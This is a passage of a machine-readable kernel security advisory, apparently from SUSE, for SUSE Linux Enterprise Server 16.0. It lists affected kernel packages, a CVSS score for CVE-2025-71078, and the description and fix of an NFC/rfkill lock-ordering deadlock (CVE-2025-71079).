"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
